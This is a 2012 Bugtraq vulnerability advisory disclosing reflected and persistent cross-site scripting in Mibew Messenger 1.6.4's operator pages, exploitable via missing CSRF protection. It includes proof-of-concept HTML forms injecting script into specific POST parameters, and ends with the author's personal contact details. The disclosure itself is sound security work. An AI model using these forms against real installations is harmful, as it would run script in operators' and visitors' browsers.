'Mibew messenger multiple XSS'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Mibew messenger multiple XSS
From:       Filippo Cavallarin <filippo.cavallarin () codseq ! it>
Date:       2012-01-30 12:27:12
Message-ID: D7AD2BDD-31B7-4AFB-A599-229B4478B225 () codseq ! it
[Download RAW message or body]

Advisory ID:	CSA-12001
Title:	Mibew messenger multiple XSS
Product:	mibew messenger
Version:	1.6.4 and probably prior
Vendor:	mibew.org
Vulnerability type:	XSS
Vendor notification:	2012-01-07
Public disclosure:	2012-01-24


Mibew messenger version 1.6.4 an probably below is vulnerable to multiple XSS (and \
persistent XSS).  They are all an POSTs and can be exploited due to the lack of CSRF \
protection



1) Input passed via the "address" and "threadid" POST parameters to /operator/ban.php \
is not properly sanitised before being returned to the user. This can be exploited to \
execute arbitrary HTML and script code in a user's browser session in context of \
affected website.


2) Input passed via the "geolinkparams" POST parameter to /operator/settings.php is \
not properly sanitised before being returned to the user. This can be exploited to \
execute arbitrary HTML and script code in a user's browser session in context of \
affected website.


3) Input passed via the "title" POST parameter to /operator/settings.php is not \
properly sanitised before being saved to database. This input is returned to the \
Operator user without any check when a new chat window is open.


4) Input passed via the "chattitle" POST parameter to /operator/settings.php is not \
properly sanitised before being saved to database. This input is returned to the \
Visitor user without any check when a new chat window is open.



The following PoC code is available:

BOF
<form method=post action="http://127.0.0.1/mibew164/operator/ban.php">
<input type=hidden name="address" value='codseq'>
<input type=hidden name="days" value="1">
<input type=hidden name="threadid" value='1"><script>alert(1)</script>'>
<input type=hidden name="comment" value="dasd">

<input type=submit value="exploit ban.php threadid - execute me twice">
</form>



<form method=post action="http://127.0.0.1/mibew164/operator/ban.php">
<input type=hidden name="address" value='codseq1"><script>alert(1)</script>'>
<input type=hidden name="days" value="1">
<input type=hidden name="comment" value="dasd">
<input type=hidden name="threadid" value='1'>

<input type=submit value="exploit ban.php address">
</form>



<form method=post action="http://127.0.0.1/mibew164/operator/settings.php">
<input type=hidden name="email" value='prova@prova.com'>
<input type=hidden name="title" value='bla bla bla'>
<input type=hidden name="logo" value='1'>
<input type=hidden name="hosturl" value='1'>
<input type=hidden name="usernamepattern" value='a'>
<input type=hidden name="chattitle" value='a'>
<input type=hidden name="geolink" value='a'>
<input type=hidden name="sendmessagekey" value='enter'>
<input type=hidden name="geolinkparams" value='<script>alert(1)</script>'>

<input type=submit value="exploit settings.php geolinkparams">
</form>


<!-- this set a persistent XSS that gets executed when OPERATOR opens a new chat -->

<form method=post action="http://127.0.0.1/mibew164/operator/settings.php">
<input type=hidden name="email" value='prova@prova.com'>
<input type=hidden name="title" value='<script>alert(1)</script>'>
<input type=hidden name="logo" value='1'>
<input type=hidden name="hosturl" value='1'>
<input type=hidden name="usernamepattern" value='a'>
<input type=hidden name="chattitle" value='a'>
<input type=hidden name="geolink" value='a'>
<input type=hidden name="sendmessagekey" value='enter'>
<input type=hidden name="geolinkparams" value=''>

<input type=submit value="exploit settings.php title">
</form>


<!-- this set a persistent XSS that gets executed when VISITOR opens a new chat -->

<form method=post action="http://127.0.0.1/mibew164/operator/settings.php">
<input type=hidden name="email" value='prova@prova.com'>
<input type=hidden name="title" value='prova'>
<input type=hidden name="logo" value='1'>
<input type=hidden name="hosturl" value='1'>
<input type=hidden name="usernamepattern" value='a'>
<input type=hidden name="chattitle" value='<script>alert(1)</script>'>
<input type=hidden name="geolink" value='a'>
<input type=hidden name="sendmessagekey" value='enter'>
<input type=hidden name="geolinkparams" value=''>

<input type=submit value="exploit settings.php chattitle">
</form>


EOF
Solution

no sulutions availabe yet



Filippo Cavallarin


C o d S e q
Development with an eye on security
------------------------------------------------------------------------
Castello 2005, 30122 Venezia
Tel: 041 88 761 58 - Fax: 041 81 064 714 - Cell: 346 66 93 254
c.f. CVLFPP82B27L736J - p.iva 03737650279
http://www.codseq.it - filippo.cavallarin@codseq.it


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic